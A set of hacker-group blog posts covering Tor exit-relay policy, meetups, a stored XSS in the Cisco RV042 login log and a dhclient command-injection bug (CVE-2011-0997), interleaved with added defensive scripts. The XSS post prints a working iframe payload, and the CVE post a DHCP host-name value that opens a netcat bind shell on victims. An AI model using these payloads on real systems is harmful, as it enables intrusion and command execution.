Defend Online Anonymity – Set Up a Tor Relay

Got this in an email from the good people over at EFF:

Dear Anarchy,
We use Tor to access our website and to publish to our blog, which is blocked inside of our country. — Iranian human rights activist
If you could do something to make the Internet safer and more private for activists, investigative journalists, and humanitarian aid workers around the world, would you?

You can.

Today EFF is launching the Tor Challenge—a campaign to encourage Internet users all over the world to support the Tor network by operating relays.

Tor is a service that helps you to protect your anonymity while using the Internet and allows you to circumvent Internet censorship. When you use the Tor software, your real IP address remains hidden. Activists all over the world depend on Tor to maintain anonymity when communicating and accessing websites that have been blocked by their governments.

The Tor software depends on the Tor network, which is made up of Tor relays operated by individuals like you. The more Tor relays we have running, the faster, more secure and more robust the Tor network becomes.

Are you ready to help Internet activists all over the world?

Click here to see how and learn more.
Defending your digital rights,

The EFF Activism Team

This is a great idea and more ppl should run Tor exit relays, but it does not come without some pains. I kept on getting DMCA notices so I had to employ a few exit policy rules on my relay. Here are the ones I'm using.

ExitPolicy accept *:20-23 # FTP, SSH, telnet
ExitPolicy accept *:43 # WHOIS
ExitPolicy accept *:53 # DNS
ExitPolicy accept *:79-81 # finger, HTTP
ExitPolicy accept *:88 # kerberos
ExitPolicy accept *:110 # POP3
ExitPolicy accept *:143 # IMAP
ExitPolicy accept *:194 # IRC
ExitPolicy accept *:220 # IMAP3
ExitPolicy accept *:443 # HTTPS
ExitPolicy accept *:464-465 # kpasswd, SMTP over SSL
ExitPolicy accept *:543-544
ExitPolicy accept *:563 # NNTP over SSL
ExitPolicy accept *:587 # SMTP
ExitPolicy accept *:706
ExitPolicy accept *:749 # kerberos
ExitPolicy accept *:873 # rsync
ExitPolicy accept *:902-904
ExitPolicy accept *:981
ExitPolicy accept *:989-995 # FTP over SSL, Netnews Administration System, telnets, IMAP over SSL, ircs, POP3 over SSL
ExitPolicy accept *:1194 # openvpn
ExitPolicy accept *:1220 # QT Server Admin
ExitPolicy accept *:1293 # PKT-KRB-IPSec
ExitPolicy accept *:1500 # VLSI License Manager
ExitPolicy accept *:1723 # PPTP
ExitPolicy accept *:1863 # MSNP
ExitPolicy accept *:2082-2083 # Radius
ExitPolicy accept *:2086-2087 # GNUnet, ELI
ExitPolicy accept *:2095-2096 # NBX
ExitPolicy accept *:3128 # SQUID
ExitPolicy accept *:3389 # MS WBT
ExitPolicy accept *:3690 # SVN
ExitPolicy accept *:4321 # RWHOIS
ExitPolicy accept *:4643
ExitPolicy accept *:5050 # MMCC
ExitPolicy accept *:5190 # ICQ
ExitPolicy accept *:5222-5223 # XMPP, XMPP over SSL
ExitPolicy accept *:5900 # VNC
ExitPolicy accept *:6666-6667 # IRC
ExitPolicy accept *:6679
ExitPolicy accept *:6697
ExitPolicy accept *:8000 # iRDMI
ExitPolicy accept *:8008
ExitPolicy accept *:8080 # HTTP Proxies
ExitPolicy accept *:8087-8088 # Simplify Media SPP Protocol, Radan HTTP
ExitPolicy accept *:8443 # PCsync HTTPS
ExitPolicy accept *:8888 # HTTP Proxies, NewsEDGE
ExitPolicy accept *:9418 # git
ExitPolicy accept *:9999 # distinct
ExitPolicy accept *:10000 # Network Data Management Protocol
ExitPolicy accept *:19638
ExitPolicy reject *:*

So anyway, yes everyone should run a Tor relay and should also use the above for your Tor relay config. On Ubuntu boxes just search for ExitPolicy in /etc/tor/torrc and paste it in. Be sure to comment out any pre-existing exit policies. OK, go set up a Tor exit relay already!!
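Tor checks ExitPolicy rules in order and the first match wins, which is why a pre-existing line left above the list silently overrides it. The script below is an added example, not part of the original post: it parses the `*:PORT` rule forms used above from a constructed torrc excerpt, flags a leftover catch-all, and shows the decision for a few ports with and without it.

```python
import re

# Constructed torrc excerpt: a leftover catch-all above a shortened copy of the list.
SAMPLE_TORRC = """\
ExitPolicy accept *:*   # pre-existing line that was never commented out
#ExitPolicy reject *:25
ExitPolicy accept *:20-23 # FTP, SSH, telnet
ExitPolicy accept *:443 # HTTPS
ExitPolicy accept *:6666-6667 # IRC
ExitPolicy reject *:*
"""

# Only the "*:PORT", "*:LOW-HIGH" and "*:*" forms used in the post are parsed.
RULE = re.compile(r"\s*ExitPolicy\s+(accept|reject)\s+\*:(\*|\d+)(?:-(\d+))?")

def parse_policy(text):
    """Return [(action, low, high)] for the active (uncommented) ExitPolicy lines."""
    rules = []
    for line in text.splitlines():
        m = RULE.match(line)
        if m is None:
            continue  # comment, blank line or unrelated option
        action, low, high = m.groups()
        if low == "*":
            rules.append((action, 1, 65535))
        else:
            rules.append((action, int(low), int(high or low)))
    return rules

def decision(rules, port):
    """Walk the rules in order; the first one covering the port decides."""
    for action, low, high in rules:
        if low <= port <= high:
            return action
    return None  # nothing matched; Tor's built-in defaults are not modelled here

def shadowing_rules(rules):
    """Indexes of catch-all rules that hide every rule written after them."""
    return [i for i, (_, low, high) in enumerate(rules[:-1])
            if (low, high) == (1, 65535)]

if __name__ == "__main__":
    rules = parse_policy(SAMPLE_TORRC)
    print("shadowing rule indexes:", shadowing_rules(rules))
    for port in (25, 443, 6881):
        print(port, "as written:", decision(rules, port),
              "| leftover removed:", decision(rules[1:], port))
```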

Know your rights event!!

dc414 is proud to produce the “Know your rights event” on July 1st 2011 at Candlelight Collective. The goal of this event is to educate the people and teach them how they can preserve their civil liberties during police encounters with confidence. The event will start with a viewing of the 40 minute film “10 Rules for Dealing with Police” from FlexYourRights.org followed by a few words from Waring R. Fincke attorney at law. After which there will be time for any questions the audience might have.

Help us spread the word! Download this flyer, make copies and post them around!

More info HERE

Cisco Small Business RV042 XSS

The RV042 is a dual WAN, 4 port switch, VPN router. Work just got it in to do a little load balancing and for failover protection. One of my favorite things to do with new toys like this guy is give them a nice once-over, which of course is how I found an XSS in the login logging functions of this device. I was originally looking for weaknesses in the login scheme and noticed that my attempts were being logged, notably the user name I was trying to log in as was being logged, along with a brief description of the failure. I then put non-standard characters in there, which broke the UI. After some more playing around I found I was able to get HTML to render, and from there I just started messing with XSS payloads till I found one that worked.

Here is my working XSS at the login screen:
The string I used is < iframe src="https://new.dc414.org" >
For the password I just put in some junk

Here is what it looks like after I submit:

Here is the XSS in action 🙂

K that's it, enjoy, peace.
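The bug class described above is stored XSS: the attempted user name is written to the log and later placed into the admin log page without output encoding. The sketch below is an added example, not the RV042 firmware's code; the log record layout and function names are assumptions. It renders a failed-login row the unescaped way and the escaped way, then uses an HTML parser to show which tags a browser would actually see.

```python
import html
from html.parser import HTMLParser

# Constructed failed-login records; the second user name is the iframe string
# from the post with its spacing normalised.
FAILED_LOGINS = [
    {"time": "May 10 21:14:03", "user": "admin", "reason": "wrong password"},
    {"time": "May 10 21:15:40", "user": '<iframe src="https://new.dc414.org">',
     "reason": "wrong password"},
]

ROW = "<tr><td>{time}</td><td>{user}</td><td>{reason}</td></tr>"

def render_row_unescaped(entry):
    """Behaviour described in the post: the logged user name goes in raw."""
    return ROW.format(**entry)

def render_row_escaped(entry):
    """Encode every logged field for the HTML context before templating."""
    return ROW.format(**{k: html.escape(str(v), quote=True)
                         for k, v in entry.items()})

class TagCollector(HTMLParser):
    """Records the start tags an HTML parser finds in a fragment."""
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)

def tags_in(markup):
    collector = TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags

if __name__ == "__main__":
    for entry in FAILED_LOGINS:
        print("unescaped:", tags_in(render_row_unescaped(entry)))
        print("escaped:  ", tags_in(render_row_escaped(entry)))
```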

New meeting spot: Brewing Grounds for Change

We have switched places again, but I hope for the last time. The new venue is Brewing Grounds for Change on Farwell Avenue. For directions or more info check out the Meetings page. Another new thing we are starting is we are asking people that plan on coming to meetings to bring $5 or a non-perishable food item. The money will go toward paying for prizes “the ones we give away at meetings/events”, events and other stuff dc414. The food will go to the food pantry 🙂 We will see you at the next meeting!

May 2011 meeting

Another awesome meeting with dc414 this month. dw5304 pwned us all with his GPS jammer and an Arduino RFID reader. The laser mic from last month's meeting was busted out for a while and ngharo brought his oscilloscope, which we used to mess with the RFID reader. Vladimir had some killer lasers, one of which we used to light a cig 😀 Check out the vids below to see some of the fun 🙂

The laser lighter – https://www.youtube.com/watch?v=FRFPO2X-Mao

Arduino RFID reader demo – https://www.youtube.com/watch?v=PfCxP5Huoxw

oscilloscope + RFID play time – https://www.youtube.com/watch?v=4c5NK9idhtA

New meeting place for dc414.

We will be holding the next dc414 at a new location. See the meetings page for more info on the location. It should be a more hacker friendly place and it has tons more space for us to move around in. Be sure to come hang out with the dc414 crew, do some hacking and get a chance to win free junk from dc414!! See you there!!

Fun with CVE-2011-0997

Saw a killer DHCP client bug come across the wire the other day and thought it would be fun to play around with. Here's some info on it:
dhclient in ISC DHCP 3.0.x through 4.2.x before 4.2.1-P1, 3.1-ESV before 3.1-ESV-R1, and 4.1-ESV before 4.1-ESV-R2 allows remote attackers to execute arbitrary commands via shell metacharacters in a hostname obtained from a DHCP message.
source: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0997

This is super easy to exploit, all you need to do is set up a DHCP server and edit the client's hostname to include our payload! Once you get DHCP up and running, edit your /etc/dhcp3/dhcpd.conf and locate the line that looks something like this:
subnet 10.10.5.0 netmask 255.255.255.0 {
Then right under it add something like this:
option host-name "test;nc -l -p 1337 -e /bin/bash";
Now using the above payload, when someone requests an IP from you and it's accepted, a shell will open on port 1337 on their machine 😀

What happens is the victim's computer gets the hostname value from DHCP, then just runs it against the shell. Now because we added a shell metacharacter “;” we are telling the shell that it has multiple commands to execute, which in the above case are the command to change the hostname to test and “nc -l -p 1337 -e /bin/bash”. Fun right? OK that's it, peace.
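On the client side, the defence is to treat the host-name option as untrusted input: accept only hostname characters and never paste the value into a shell command string. The validator below is an added example, not ISC's patch; the function names and sample values are assumptions, and the second sample is the host-name string from the post.

```python
import re
import shlex

# One hostname label (RFC 952/1123): letters, digits and hyphens, 1-63 chars,
# no hyphen at either end.
LABEL = re.compile(r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?")

def is_valid_hostname(value):
    """Accept only dot-separated labels, 253 characters at most."""
    if not value or len(value) > 253:
        return False
    return all(LABEL.fullmatch(label) for label in value.split("."))

def shell_view(value):
    """Tokens a POSIX shell sees if the value is pasted into a command string."""
    return list(shlex.shlex("hostname " + value, posix=True,
                            punctuation_chars=True))

def hostname_argv(value):
    """Build an argv list (no shell involved), and only for validated values."""
    if not is_valid_hostname(value):
        raise ValueError("rejected DHCP host-name option: %r" % value)
    return ["hostname", value]

def audit(values):
    """Return the option values a client should refuse to act on."""
    return [v for v in values if not is_valid_hostname(v)]

# Constructed option values for the demonstration.
SAMPLES = [
    "web-01.example.org",
    "test;nc -l -p 1337 -e /bin/bash",
    "host$(id)",
    "-bad",
]

if __name__ == "__main__":
    for value in SAMPLES:
        verdict = "valid" if is_valid_hostname(value) else "REJECT"
        print("%-35r %-6s shell tokens: %s" % (value, verdict, shell_view(value)))
```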

Good times @ mke makerspace open house

Me and ngh made a trip to mke makerspace’s open house and man it was well worth the ride. Got to see lots of cool clocks 😀 make a little blinking LED in soldering class, watched a makerbot in action and tons more awesome stuff. Also thanks to makerspace we also have a nice DIY project to give away at the next dc414 meeting “the blinky light we made in soldering class”. Here's some pics I took while there. That's it, peace.
mke makerspace